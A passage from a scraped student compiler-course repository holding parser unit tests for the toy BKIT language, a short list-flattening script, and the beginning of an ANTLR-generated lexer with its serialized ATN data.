self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n a[3 + foo(2)] = a[b[2][3]] + 4;\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=292\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n Var: x[1][2] = {ab,da};\n a[3 + foo(2)] = a[b[2][3]] + 4;\n EndBody.\"\"\"\n expect=\"\"\"Error on line 5 col 24: ab\"\"\"\n num=293\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_6(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n If expr Then \n ElseIf expr Then\n Else\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=294\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_7(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n If expr Then \n ElseIf expr Then\n While expr Do EndWhile.\n Do Return; While {{}} EndDo.\n Else\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=295\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_8(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n If expr Then \n ElseIf expr Then\n While expr Do EndWhile.\n Do Return; While {{}} EndDo.\n Else nothing(); a=(1==b+a);\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=296\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_9(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n If expr Then \n ElseIf expr Then\n While expr Do EndWhile.\n Do Return; While {{}} EndDo.\n Else nothing(); a=1=b+a;\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 9 col 27: =\"\"\"\n num=297\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_10(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n For(i=expr, a =/= {{}}, \"what is that\" + 1) Do\n EndFor.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=298\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_11(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n For(i=expr, a =/= {{}, \"what is that\" + 1) Do\n EndFor.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 5 col 46: +\"\"\"\n num=299\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_extra_12(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n For(i=expr, a =/= {{}}, \"what is that'\"\\\\b\" + 1) Do\n Break Continue;\n EndFor.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 6 col 14: Continue\"\"\"\n num=300\n self.assertTrue(TestParser.checkParser(input, expect, num))" }, { "alpha_fraction": 0.5966851115226746, "alphanum_fraction": 0.6436464190483093, "avg_line_length": 23.133333206176758, "blob_id": "dd1c26f8a7fdee68315fd368174b5c79695d2dea", "content_id": "60ecbdf1cbd4a49aba9d1fe6dcd04ad477088431", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 362, "license_type": "no_license", "max_line_length": 70, "num_lines": 15, "path": "/FP/Question2.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from functools import reduce\n\ndef flatten(lsts):\n return [item for lst in lsts for item in lst]\n\ndef flatten1(lsts):\n return list(lsts[0] + flatten1(lsts[1:]) if len(lsts) > 0 else [])\n\ndef flatten2(lsts):\n return reduce(lambda x,y: x + y, lsts)\n\nstm = [[1,2,3],['a','b','c'],[1.1,2.1,3.1]]\nprint(flatten(stm))\nprint(flatten1(stm))\nprint(flatten2(stm))\n" }, { "alpha_fraction": 0.2946336567401886, "alphanum_fraction": 0.5589426159858704, "avg_line_length": 57.80607604980469, "blob_id": "07e0925f2f50a9758de1b2a04277e691ff3ca519", "content_id": "a78caa0ce9ce2681f06f81403c47994063f2834e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25194, "license_type": "no_license", "max_line_length": 103, "num_lines": 428, "path": "/LexicalAnalysis/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2E\")\n buf.write(\"\\u022f\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\4.\")\n buf.write(\"\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\")\n buf.write(\"\\t\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\")\n buf.write(\"\\4;\\t;\\4<\\t<\\4=\\t=\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\t\")\n buf.write(\"C\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\\tI\\4J\\tJ\\4K\\tK\\4L\\t\")\n buf.write(\"L\\4M\\tM\\4N\\tN\\4O\\tO\\4P\\tP\\4Q\\tQ\\4R\\tR\\4S\\tS\\4T\\tT\\4U\\t\")\n buf.write(\"U\\3\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\7\\3\\u00b2\\n\\3\\f\\3\\16\\3\\u00b5\")\n buf.write(\"\\13\\3\\3\\4\\3\\4\\7\\4\\u00b9\\n\\4\\f\\4\\16\\4\\u00bc\\13\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\5\\3\\5\\7\\5\\u00c2\\n\\5\\f\\5\\16\\5\\u00c5\\13\\5\\3\\5\\5\\5\\u00c8\")\n buf.write(\"\\n\\5\\3\\6\\3\\6\\3\\6\\3\\6\\7\\6\\u00ce\\n\\6\\f\\6\\16\\6\\u00d1\\13\\6\")\n buf.write(\"\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\3\\7\\7\\7\\u00dc\\n\\7\\f\\7\")\n buf.write(\"\\16\\7\\u00df\\13\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\t\\6\\t\\u00e6\\n\\t\\r\\t\")\n buf.write(\"\\16\\t\\u00e7\\3\\t\\3\\t\\3\\n\\3\\n\\3\\13\\3\\13\\3\\f\\3\\f\\3\\r\\3\\r\")\n buf.write(\"\\5\\r\\u00f4\\n\\r\\3\\16\\5\\16\\u00f7\\n\\16\\3\\17\\3\\17\\3\\17\\6\\17\")\n buf.write(\"\\u00fc\\n\\17\\r\\17\\16\\17\\u00fd\\3\\20\\3\\20\\7\\20\\u0102\\n\\20\")\n buf.write(\"\\f\\20\\16\\20\\u0105\\13\\20\\3\\21\\6\\21\\u0108\\n\\21\\r\\21\\16\\21\")\n buf.write(\"\\u0109\\3\\21\\3\\21\\5\\21\\u010e\\n\\21\\3\\21\\5\\21\\u0111\\n\\21\")\n buf.write(\"\\3\\22\\3\\22\\3\\22\\3\\23\\3\\23\\3\\23\\3\\24\\3\\24\\3\\24\\3\\25\\3\\25\")\n buf.write(\"\\3\\25\\5\\25\\u011f\\n\\25\\3\\26\\3\\26\\3\\27\\3\\27\\3\\30\\3\\30\\3\")\n buf.write(\"\\30\\3\\30\\5\\30\\u0129\\n\\30\\3\\30\\6\\30\\u012c\\n\\30\\r\\30\\16\")\n buf.write(\"\\30\\u012d\\3\\31\\6\\31\\u0131\\n\\31\\r\\31\\16\\31\\u0132\\3\\32\\3\")\n buf.write(\"\\32\\3\\32\\3\\32\\5\\32\\u0139\\n\\32\\3\\32\\6\\32\\u013c\\n\\32\\r\\32\")\n buf.write(\"\\16\\32\\u013d\\3\\33\\3\\33\\3\\33\\3\\33\\5\\33\\u0144\\n\\33\\3\\34\")\n buf.write(\"\\3\\34\\3\\34\\5\\34\\u0149\\n\\34\\3\\35\\3\\35\\3\\36\\3\\36\\5\\36\\u014f\")\n buf.write(\"\\n\\36\\3\\37\\3\\37\\7\\37\\u0153\\n\\37\\f\\37\\16\\37\\u0156\\13\\37\")\n buf.write(\"\\3\\37\\3\\37\\3\\37\\3 \\3 \\3 \\3 \\3 \\3!\\3!\\3!\\3!\\3!\\3!\\3\\\"\\3\")\n buf.write(\"\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3#\\3#\\3#\\3$\\3$\\3$\\3$\\3\")\n buf.write(\"$\\3%\\3%\\3%\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\")\n buf.write(\"\\'\\3\\'\\3\\'\\3\\'\\3(\\3(\\3(\\3(\\3(\\3(\\3(\\3)\\3)\\3)\\3)\\3)\\3)\")\n buf.write(\"\\3)\\3)\\3)\\3*\\3*\\3*\\3*\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\3,\\3\")\n buf.write(\",\\3,\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3.\\3.\\3.\\3.\\3.\\3.\\3\")\n buf.write(\".\\3/\\3/\\3/\\3/\\3/\\3\\60\\3\\60\\3\\60\\3\\60\\3\\61\\3\\61\\3\\61\\3\")\n buf.write(\"\\61\\3\\61\\3\\61\\3\\62\\3\\62\\3\\62\\3\\62\\3\\62\\3\\63\\3\\63\\3\\63\")\n buf.write(\"\\3\\63\\3\\63\\3\\63\\3\\64\\3\\64\\3\\64\\3\\64\\3\\64\\3\\64\\3\\65\\3\\65\")\n buf.write(\"\\3\\66\\3\\66\\3\\66\\3\\67\\3\\67\\38\\38\\38\\39\\39\\3:\\3:\\3:\\3;\\3\")\n buf.write(\";\\3<\\3<\\3<\\3=\\3=\\3>\\3>\\3?\\3?\\3?\\3@\\3@\\3@\\3A\\3A\\3A\\3B\\3\")\n buf.write(\"B\\3B\\3C\\3C\\3D\\3D\\3E\\3E\\3E\\3F\\3F\\3F\\3G\\3G\\3G\\3G\\3H\\3H\\3\")\n buf.write(\"H\\3I\\3I\\3I\\3J\\3J\\3J\\3J\\3K\\3K\\3K\\3K\\3L\\3L\\3M\\3M\\3N\\3N\\3\")\n buf.write(\"O\\3O\\3P\\3P\\3Q\\3Q\\3R\\3R\\3S\\3S\\3T\\3T\\3U\\3U\\4\\u00cf\\u00dd\")\n buf.write(\"\\2V\\3\\3\\5\\4\\7\\5\\t\\6\\13\\7\\r\\b\\17\\t\\21\\n\\23\\2\\25\\2\\27\\2\")\n buf.write(\"\\31\\2\\33\\2\\35\\2\\37\\2!\\2#\\2%\\2\\'\\2)\\2+\\2-\\2/\\2\\61\\2\\63\")\n buf.write(\"\\2\\65\\13\\67\\f9\\r;\\16=\\17?\\20A\\21C\\22E\\23G\\24I\\25K\\26M\")\n buf.write(\"\\27O\\30Q\\31S\\32U\\33W\\34Y\\35[\\36]\\37_ a!c\\\"e#g$i%k&m\\'\")\n buf.write(\"o(q)s*u+w,y-{.}/\\177\\60\\u0081\\61\\u0083\\62\\u0085\\63\\u0087\")\n buf.write(\"\\64\\u0089\\65\\u008b\\66\\u008d\\67\\u008f8\\u00919\\u0093:\\u0095\")\n buf.write(\";\\u0097<\\u0099=\\u009b>\\u009d?\\u009f@\\u00a1A\\u00a3B\\u00a5\")\n buf.write(\"C\\u00a7D\\u00a9E\\3\\2\\17\\4\\3\\n\\f\\16\\17\\4\\2\\60\\60AA\\5\\2\\13\")\n buf.write(\"\\f\\16\\17\\\"\\\"\\3\\2c|\\3\\2C\\\\\\3\\2\\62;\\4\\2--//\\4\\2GGgg\\3\\2\")\n buf.write(\"\\60\\60\\t\\2))^^ddhhppttvv\\7\\2\\n\\f\\16\\17$$))^^\\5\\2\\62;C\")\n buf.write(\"Hch\\3\\2\\629\\2\\u0239\\2\\3\\3\\2\\2\\2\\2\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\")\n buf.write(\"\\2\\2\\t\\3\\2\\2\\2\\2\\13\\3\\2\\2\\2\\2\\r\\3\\2\\2\\2\\2\\17\\3\\2\\2\\2\\2\")\n buf.write(\"\\21\\3\\2\\2\\2\\2\\65\\3\\2\\2\\2\\2\\67\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2;\\3\")\n buf.write(\"\\2\\2\\2\\2=\\3\\2\\2\\2\\2?\\3\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\")\n buf.write(\"\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2\")\n buf.write(\"O\\3\\2\\2\\2\\2Q\\3\\2\\2\\2\\2S\\3\\2\\2\\2\\2U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\")\n buf.write(\"\\2Y\\3\\2\\2\\2\\2[\\3\\2\\2\\2\\2]\\3\\2\\2\\2\\2_\\3\\2\\2\\2\\2a\\3\\2\\2\")\n buf.write(\"\\2\\2c\\3\\2\\2\\2\\2e\\3\\2\\2\\2\\2g\\3\\2\\2\\2\\2i\\3\\2\\2\\2\\2k\\3\\2\")\n buf.write(\"\\2\\2\\2m\\3\\2\\2\\2\\2o\\3\\2\\2\\2\\2q\\3\\2\\2\\2\\2s\\3\\2\\2\\2\\2u\\3\")\n buf.write(\"\\2\\2\\2\\2w\\3\\2\\2\\2\\2y\\3\\2\\2\\2\\2{\\3\\2\\2\\2\\2}\\3\\2\\2\\2\\2\\177\")\n buf.write(\"\\3\\2\\2\\2\\2\\u0081\\3\\2\\2\\2\\2\\u0083\\3\\2\\2\\2\\2\\u0085\\3\\2\\2\")\n buf.write(\"\\2\\2\\u0087\\3\\2\\2\\2\\2\\u0089\\3\\2\\2\\2\\2\\u008b\\3\\2\\2\\2\\2\\u008d\")\n buf.write(\"\\3\\2\\2\\2\\2\\u008f\\3\\2\\2\\2\\2\\u0091\\3\\2\\2\\2\\2\\u0093\\3\\2\\2\")\n buf.write(\"\\2\\2\\u0095\\3\\2\\2\\2\\2\\u0097\\3\\2\\2\\2\\2\\u0099\\3\\2\\2\\2\\2\\u009b\")\n buf.write(\"\\3\\2\\2\\2\\2\\u009d\\3\\2\\2\\2\\2\\u009f\\3\\2\\2\\2\\2\\u00a1\\3\\2\\2\")\n buf.write(\"\\2\\2\\u00a3\\3\\2\\2\\2\\2\\u00a5\\3\\2\\2\\2\\2\\u00a7\\3\\2\\2\\2\\2\\u00a9\")\n buf.write(\"\\3\\2\\2\\2\\3\\u00ab\\3\\2\\2\\2\\5\\u00ae\\3\\2\\2\\2\\7\\u00b6\\3\\2\\2\")\n buf.write(\"\\2\\t\\u00bf\\3\\2\\2\\2\\13\\u00c9\\3\\2\\2\\2\\r\\u00d7\\3\\2\\2\\2\\17\")\n buf.write(\"\\u00e2\\3\\2\\2\\2\\21\\u00e5\\3\\2\\2\\2\\23\\u00eb\\3\\2\\2\\2\\25\\u00ed\")\n buf.write(\"\\3\\2\\2\\2\\27\\u00ef\\3\\2\\2\\2\\31\\u00f3\\3\\2\\2\\2\\33\\u00f6\\3\")\n buf.write(\"\\2\\2\\2\\35\\u00f8\\3\\2\\2\\2\\37\\u00ff\\3\\2\\2\\2!\\u0107\\3\\2\\2\")\n buf.write(\"\\2#\\u0112\\3\\2\\2\\2%\\u0115\\3\\2\\2\\2\\'\\u0118\\3\\2\\2\\2)\\u011e\")\n buf.write(\"\\3\\2\\2\\2+\\u0120\\3\\2\\2\\2-\\u0122\\3\\2\\2\\2/\\u0128\\3\\2\\2\\2\")\n buf.write(\"\\61\\u0130\\3\\2\\2\\2\\63\\u0138\\3\\2\\2\\2\\65\\u0143\\3\\2\\2\\2\\67\")\n buf.write(\"\\u0148\\3\\2\\2\\29\\u014a\\3\\2\\2\\2;\\u014e\\3\\2\\2\\2=\\u0150\\3\")\n buf.write(\"\\2\\2\\2?\\u015a\\3\\2\\2\\2A\\u015f\\3\\2\\2\\2C\\u0165\\3\\2\\2\\2E\\u016e\")\n buf.write(\"\\3\\2\\2\\2G\\u0171\\3\\2\\2\\2I\\u0176\\3\\2\\2\\2K\\u017d\\3\\2\\2\\2\")\n buf.write(\"M\\u0184\\3\\2\\2\\2O\\u018a\\3\\2\\2\\2Q\\u0191\\3\\2\\2\\2S\\u019a\\3\")\n buf.write(\"\\2\\2\\2U\\u019e\\3\\2\\2\\2W\\u01a7\\3\\2\\2\\2Y\\u01aa\\3\\2\\2\\2[\\u01b4\")\n buf.write(\"\\3\\2\\2\\2]\\u01bb\\3\\2\\2\\2_\\u01c0\\3\\2\\2\\2a\\u01c4\\3\\2\\2\\2\")\n buf.write(\"c\\u01ca\\3\\2\\2\\2e\\u01cf\\3\\2\\2\\2g\\u01d5\\3\\2\\2\\2i\\u01db\\3\")\n buf.write(\"\\2\\2\\2k\\u01dd\\3\\2\\2\\2m\\u01e0\\3\\2\\2\\2o\\u01e2\\3\\2\\2\\2q\\u01e5\")\n buf.write(\"\\3\\2\\2\\2s\\u01e7\\3\\2\\2\\2u\\u01ea\\3\\2\\2\\2w\\u01ec\\3\\2\\2\\2\")\n buf.write(\"y\\u01ef\\3\\2\\2\\2{\\u01f1\\3\\2\\2\\2}\\u01f3\\3\\2\\2\\2\\177\\u01f6\")\n buf.write(\"\\3\\2\\2\\2\\u0081\\u01f9\\3\\2\\2\\2\\u0083\\u01fc\\3\\2\\2\\2\\u0085\")\n buf.write(\"\\u01ff\\3\\2\\2\\2\\u0087\\u0201\\3\\2\\2\\2\\u0089\\u0203\\3\\2\\2\\2\")\n buf.write(\"\\u008b\\u0206\\3\\2\\2\\2\\u008d\\u0209\\3\\2\\2\\2\\u008f\\u020d\\3\")\n buf.write(\"\\2\\2\\2\\u0091\\u0210\\3\\2\\2\\2\\u0093\\u0213\\3\\2\\2\\2\\u0095\\u0217\")\n buf.write(\"\\3\\2\\2\\2\\u0097\\u021b\\3\\2\\2\\2\\u0099\\u021d\\3\\2\\2\\2\\u009b\")\n buf.write(\"\\u021f\\3\\2\\2\\2\\u009d\\u0221\\3\\2\\2\\2\\u009f\\u0223\\3\\2\\2\\2\")\n buf.write(\"\\u00a1\\u0225\\3\\2\\2\\2\\u00a3\\u0227\\3\\2\\2\\2\\u00a5\\u0229\\3\")\n buf.write(\"\\2\\2\\2\\u00a7\\u022b\\3\\2\\2\\2\\u00a9\\u022d\\3\\2\\2\\2\\u00ab\\u00ac\")\n buf.write(\"\\5\\33\\16\\2\\u00ac\\u00ad\\5!\\21\\2\\u00ad\\4\\3\\2\\2\\2\\u00ae\\u00b3\")\n buf.write(\"\\5\\23\\n\\2\\u00af\\u00b2\\5\\23\\n\\2\\u00b0\\u00b2\\5\\27\\f\\2\\u00b1\")\n buf.write(\"\\u00af\\3\\2\\2\\2\\u00b1\\u00b0\\3\\2\\2\\2\\u00b2\\u00b5\\3\\2\\2\\2\")\n buf.write(\"\\u00b3\\u00b1\\3\\2\\2\\2\\u00b3\\u00b4\\3\\2\\2\\2\\u00b4\\6\\3\\2\\2\")\n buf.write(\"\\2\\u00b5\\u00b3\\3\\2\\2\\2\\u00b6\\u00ba\\7$\\2\\2\\u00b7\\u00b9\")\n buf.write(\"\\5)\\25\\2\\u00b8\\u00b7\\3\\2\\2\\2\\u00b9\\u00bc\\3\\2\\2\\2\\u00ba\")\n buf.write(\"\\u00b8\\3\\2\\2\\2\\u00ba\\u00bb\\3\\2\\2\\2\\u00bb\\u00bd\\3\\2\\2\\2\")\n buf.write(\"\\u00bc\\u00ba\\3\\2\\2\\2\\u00bd\\u00be\\5#\\22\\2\\u00be\\b\\3\\2\\2\")\n buf.write(\"\\2\\u00bf\\u00c3\\7$\\2\\2\\u00c0\\u00c2\\5)\\25\\2\\u00c1\\u00c0\")\n buf.write(\"\\3\\2\\2\\2\\u00c2\\u00c5\\3\\2\\2\\2\\u00c3\\u00c1\\3\\2\\2\\2\\u00c3\")\n buf.write(\"\\u00c4\\3\\2\\2\\2\\u00c4\\u00c7\\3\\2\\2\\2\\u00c5\\u00c3\\3\\2\\2\\2\")\n buf.write(\"\\u00c6\\u00c8\\t\\2\\2\\2\\u00c7\\u00c6\\3\\2\\2\\2\\u00c8\\n\\3\\2\\2\")\n buf.write(\"\\2\\u00c9\\u00ca\\7,\\2\\2\\u00ca\\u00cb\\7,\\2\\2\\u00cb\\u00cf\\3\")\n buf.write(\"\\2\\2\\2\\u00cc\\u00ce\\13\\2\\2\\2\\u00cd\\u00cc\\3\\2\\2\\2\\u00ce\")\n buf.write(\"\\u00d1\\3\\2\\2\\2\\u00cf\\u00d0\\3\\2\\2\\2\\u00cf\\u00cd\\3\\2\\2\\2\")\n buf.write(\"\\u00d0\\u00d2\\3\\2\\2\\2\\u00d1\\u00cf\\3\\2\\2\\2\\u00d2\\u00d3\\7\")\n buf.write(\",\\2\\2\\u00d3\\u00d4\\7,\\2\\2\\u00d4\\u00d5\\3\\2\\2\\2\\u00d5\\u00d6\")\n buf.write(\"\\b\\6\\2\\2\\u00d6\\f\\3\\2\\2\\2\\u00d7\\u00d8\\7,\\2\\2\\u00d8\\u00d9\")\n buf.write(\"\\7,\\2\\2\\u00d9\\u00dd\\3\\2\\2\\2\\u00da\\u00dc\\13\\2\\2\\2\\u00db\")\n buf.write(\"\\u00da\\3\\2\\2\\2\\u00dc\\u00df\\3\\2\\2\\2\\u00dd\\u00de\\3\\2\\2\\2\")\n buf.write(\"\\u00dd\\u00db\\3\\2\\2\\2\\u00de\\u00e0\\3\\2\\2\\2\\u00df\\u00dd\\3\")\n buf.write(\"\\2\\2\\2\\u00e0\\u00e1\\7\\2\\2\\3\\u00e1\\16\\3\\2\\2\\2\\u00e2\\u00e3\")\n buf.write(\"\\t\\3\\2\\2\\u00e3\\20\\3\\2\\2\\2\\u00e4\\u00e6\\t\\4\\2\\2\\u00e5\\u00e4\")\n buf.write(\"\\3\\2\\2\\2\\u00e6\\u00e7\\3\\2\\2\\2\\u00e7\\u00e5\\3\\2\\2\\2\\u00e7\")\n buf.write(\"\\u00e8\\3\\2\\2\\2\\u00e8\\u00e9\\3\\2\\2\\2\\u00e9\\u00ea\\b\\t\\2\\2\")\n buf.write(\"\\u00ea\\22\\3\\2\\2\\2\\u00eb\\u00ec\\t\\5\\2\\2\\u00ec\\24\\3\\2\\2\\2\")\n buf.write(\"\\u00ed\\u00ee\\t\\6\\2\\2\\u00ee\\26\\3\\2\\2\\2\\u00ef\\u00f0\\t\\7\")\n buf.write(\"\\2\\2\\u00f0\\30\\3\\2\\2\\2\\u00f1\\u00f4\\5\\23\\n\\2\\u00f2\\u00f4\")\n buf.write(\"\\5\\25\\13\\2\\u00f3\\u00f1\\3\\2\\2\\2\\u00f3\\u00f2\\3\\2\\2\\2\\u00f4\")\n buf.write(\"\\32\\3\\2\\2\\2\\u00f5\\u00f7\\t\\b\\2\\2\\u00f6\\u00f5\\3\\2\\2\\2\\u00f6\")\n buf.write(\"\\u00f7\\3\\2\\2\\2\\u00f7\\34\\3\\2\\2\\2\\u00f8\\u00f9\\t\\t\\2\\2\\u00f9\")\n buf.write(\"\\u00fb\\5\\33\\16\\2\\u00fa\\u00fc\\5\\27\\f\\2\\u00fb\\u00fa\\3\\2\")\n buf.write(\"\\2\\2\\u00fc\\u00fd\\3\\2\\2\\2\\u00fd\\u00fb\\3\\2\\2\\2\\u00fd\\u00fe\")\n buf.write(\"\\3\\2\\2\\2\\u00fe\\36\\3\\2\\2\\2\\u00ff\\u0103\\t\\n\\2\\2\\u0100\\u0102\")\n buf.write(\"\\5\\27\\f\\2\\u0101\\u0100\\3\\2\\2\\2\\u0102\\u0105\\3\\2\\2\\2\\u0103\")\n buf.write(\"\\u0101\\3\\2\\2\\2\\u0103\\u0104\\3\\2\\2\\2\\u0104 \\3\\2\\2\\2\\u0105\")\n buf.write(\"\\u0103\\3\\2\\2\\2\\u0106\\u0108\\5\\27\\f\\2\\u0107\\u0106\\3\\2\\2\")\n buf.write(\"\\2\\u0108\\u0109\\3\\2\\2\\2\\u0109\\u0107\\3\\2\\2\\2\\u0109\\u010a\")\n buf.write(\"\\3\\2\\2\\2\\u010a\\u0110\\3\\2\\2\\2\\u010b\\u010d\\5\\37\\20\\2\\u010c\")\n buf.write(\"\\u010e\\5\\35\\17\\2\\u010d\\u010c\\3\\2\\2\\2\\u010d\\u010e\\3\\2\\2\")\n buf.write(\"\\2\\u010e\\u0111\\3\\2\\2\\2\\u010f\\u0111\\5\\35\\17\\2\\u0110\\u010b\")\n buf.write(\"\\3\\2\\2\\2\\u0110\\u010f\\3\\2\\2\\2\\u0111\\\"\\3\\2\\2\\2\\u0112\\u0113\")\n buf.write(\"\\7^\\2\\2\\u0113\\u0114\\n\\13\\2\\2\\u0114$\\3\\2\\2\\2\\u0115\\u0116\")\n buf.write(\"\\7^\\2\\2\\u0116\\u0117\\t\\13\\2\\2\\u0117&\\3\\2\\2\\2\\u0118\\u0119\")\n buf.write(\"\\7)\\2\\2\\u0119\\u011a\\7$\\2\\2\\u011a(\\3\\2\\2\\2\\u011b\\u011f\")\n buf.write(\"\\n\\f\\2\\2\\u011c\\u011f\\5%\\23\\2\\u011d\\u011f\\5\\'\\24\\2\\u011e\")\n buf.write(\"\\u011b\\3\\2\\2\\2\\u011e\\u011c\\3\\2\\2\\2\\u011e\\u011d\\3\\2\\2\\2\")\n buf.write(\"\\u011f*\\3\\2\\2\\2\\u0120\\u0121\\t\\r\\2\\2\\u0121,\\3\\2\\2\\2\\u0122\")\n buf.write(\"\\u0123\\t\\16\\2\\2\\u0123.\\3\\2\\2\\2\\u0124\\u0125\\7\\62\\2\\2\\u0125\")\n buf.write(\"\\u0129\\7z\\2\\2\\u0126\\u0127\\7\\62\\2\\2\\u0127\\u0129\\7Z\\2\\2\")\n buf.write(\"\\u0128\\u0124\\3\\2\\2\\2\\u0128\\u0126\\3\\2\\2\\2\\u0129\\u012b\\3\")\n buf.write(\"\\2\\2\\2\\u012a\\u012c\\5+\\26\\2\\u012b\\u012a\\3\\2\\2\\2\\u012c\\u012d\")\n buf.write(\"\\3\\2\\2\\2\\u012d\\u012b\\3\\2\\2\\2\\u012d\\u012e\\3\\2\\2\\2\\u012e\")\n buf.write(\"\\60\\3\\2\\2\\2\\u012f\\u0131\\5\\27\\f\\2\\u0130\\u012f\\3\\2\\2\\2\\u0131\")\n buf.write(\"\\u0132\\3\\2\\2\\2\\u0132\\u0130\\3\\2\\2\\2\\u0132\\u0133\\3\\2\\2\\2\")\n buf.write(\"\\u0133\\62\\3\\2\\2\\2\\u0134\\u0135\\7\\62\\2\\2\\u0135\\u0139\\7q\")\n buf.write(\"\\2\\2\\u0136\\u0137\\7\\62\\2\\2\\u0137\\u0139\\7Q\\2\\2\\u0138\\u0134\")\n buf.write(\"\\3\\2\\2\\2\\u0138\\u0136\\3\\2\\2\\2\\u0139\\u013b\\3\\2\\2\\2\\u013a\")\n buf.write(\"\\u013c\\5-\\27\\2\\u013b\\u013a\\3\\2\\2\\2\\u013c\\u013d\\3\\2\\2\\2\")\n buf.write(\"\\u013d\\u013b\\3\\2\\2\\2\\u013d\\u013e\\3\\2\\2\\2\\u013e\\64\\3\\2\")\n buf.write(\"\\2\\2\\u013f\\u0144\\5\\67\\34\\2\\u0140\\u0144\\59\\35\\2\\u0141\\u0144\")\n buf.write(\"\\5;\\36\\2\\u0142\\u0144\\5=\\37\\2\\u0143\\u013f\\3\\2\\2\\2\\u0143\")\n buf.write(\"\\u0140\\3\\2\\2\\2\\u0143\\u0141\\3\\2\\2\\2\\u0143\\u0142\\3\\2\\2\\2\")\n buf.write(\"\\u0144\\66\\3\\2\\2\\2\\u0145\\u0149\\5\\61\\31\\2\\u0146\\u0149\\5\")\n buf.write(\"/\\30\\2\\u0147\\u0149\\5\\63\\32\\2\\u0148\\u0145\\3\\2\\2\\2\\u0148\")\n buf.write(\"\\u0146\\3\\2\\2\\2\\u0148\\u0147\\3\\2\\2\\2\\u01498\\3\\2\\2\\2\\u014a\")\n 